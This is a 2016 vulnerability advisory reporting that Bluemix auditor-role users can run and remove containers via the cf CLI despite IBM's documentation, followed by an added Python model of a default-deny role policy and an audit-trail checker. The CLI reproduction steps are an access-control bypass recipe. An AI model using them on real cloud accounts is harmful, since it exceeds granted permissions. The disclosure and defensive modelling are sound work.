Bluemix Container Authorization Controls

Posted on 12 December 2016

# Date : 09/12/2016
# Author : Oscar Martinez
# Tested on: cf version 6.22.1+6b7af9c-2016-09-24 / Docker version 1.12.3, build 6b644ec / API endpoint: https://api.ng.bluemix.net (API version: 2.54.0)
# Vendor : IBM
# Software : Bluemix https://www.ibm.com/cloud-computing/bluemix/

# Vulnerability Description:

According to the referenced documentation, a user with the auditor role should not be able to create or delete containers.
Reference: https://console.ng.bluemix.net/docs/admin/users_roles.html

However, a user with the auditor role CAN create and delete containers using the CF CLI.

1. Connect to Bluemix with the CF CLI as the user with the "auditor" role.
   1.1 cf login [-sso]
   1.2 cf ic init

2. List the images.
   2.1 cf ic images

3. Create the container.
   3.1 cf ic run --name broken_access_666 -p 8080 -m 512 registry.ng.bluemix.net/[your site]/[your image]
   Example: cf ic run --name broken_access_666 -p 8080 -m 512 registry.ng.bluemix.net/mysite/tomcat

4. Delete your container.
   cf ic stop [your container]
   cf ic rm [your container]
   Example:
   cf ic stop broken_access_666
   cf ic rm broken_access_666

Time Line
---------

* 2016/11/28: First contact with vendor ( https://www.ibm.com/scripts/contact/contact/us/en/security_vulnerabilities/ )
* 2016/11/28: IBM PSIRT assigned PSIRT Advisory <7263>
* 2016/12/08: IBM PSIRT answered by email: "issue is working as designed"
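The control the advisory expects is a per-role allow-list in front of the container API, with the auditor role limited to read operations. The following Python is an added illustration written for this page, not code from the advisory author or from IBM. It models a permissive policy that behaves as the advisory describes (any space member may run or remove containers) beside a default-deny policy, replays the advisory's four steps under both, and scans a constructed audit trail for writes performed by read-only roles. The role names follow Cloud Foundry space roles; the permission table and the audit event format are assumptions for illustration.

```python
"""Authorization model for container operations, added as an illustration.

Assumptions (not from the advisory): Cloud Foundry space role names,
the per-role permission table, and the audit event tuple layout.
"""
from enum import Enum


class Op(Enum):
    """Container operations corresponding to the advisory's cf ic commands."""
    LIST_IMAGES = "images"
    RUN = "run"
    STOP = "stop"
    REMOVE = "rm"


READ_ONLY = frozenset({Op.LIST_IMAGES})
READ_WRITE = frozenset(Op)

SPACE_ROLES = {"SpaceDeveloper", "SpaceManager", "SpaceAuditor"}


def authorize_flawed(role, op):
    """Permissive check: membership in the space is enough for any operation.

    This reproduces the behaviour the advisory reports, where an auditor
    can run and remove containers.
    """
    return role in SPACE_ROLES


# Corrected policy: explicit allow-list per role, default deny for unknown roles.
ROLE_PERMISSIONS = {
    "SpaceDeveloper": READ_WRITE,
    "SpaceManager": READ_ONLY,   # assumption: managers administer users, not workloads
    "SpaceAuditor": READ_ONLY,   # auditors are read-only per the referenced docs
}


def authorize(role, op):
    """Default-deny check against the per-role allow-list."""
    return op in ROLE_PERMISSIONS.get(role, frozenset())


def replay_advisory_steps(policy, role="SpaceAuditor"):
    """Evaluate the advisory's steps (images, run, stop, rm) under a policy.

    Returns a mapping of operation name to whether the policy allows it.
    """
    steps = [Op.LIST_IMAGES, Op.RUN, Op.STOP, Op.REMOVE]
    return {op.value: policy(role, op) for op in steps}


# Constructed audit events: (timestamp, user, role, operation, target).
SAMPLE_EVENTS = [
    ("2016-12-09T10:00:00Z", "auditor@example.com", "SpaceAuditor", Op.LIST_IMAGES, "-"),
    ("2016-12-09T10:01:00Z", "auditor@example.com", "SpaceAuditor", Op.RUN, "broken_access_666"),
    ("2016-12-09T10:02:00Z", "dev@example.com", "SpaceDeveloper", Op.RUN, "web-1"),
    ("2016-12-09T10:03:00Z", "auditor@example.com", "SpaceAuditor", Op.REMOVE, "broken_access_666"),
]


def find_role_violations(events):
    """Flag audit events where the actor's role should not permit the operation.

    Useful when the platform enforces the permissive policy: the corrected
    policy is applied after the fact to the audit trail to surface misuse.
    """
    return [
        (ts, user, op.value, target)
        for ts, user, role, op, target in events
        if not authorize(role, op)
    ]


if __name__ == "__main__":
    print("flawed   :", replay_advisory_steps(authorize_flawed))
    print("corrected:", replay_advisory_steps(authorize))
    for violation in find_role_violations(SAMPLE_EVENTS):
        print("violation:", violation)
```

Under the permissive policy all four steps succeed for the auditor, matching the advisory; under the default-deny policy only the image listing is allowed. The same allow-list, applied to an audit trail, turns the auditor's run and rm events into findings.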
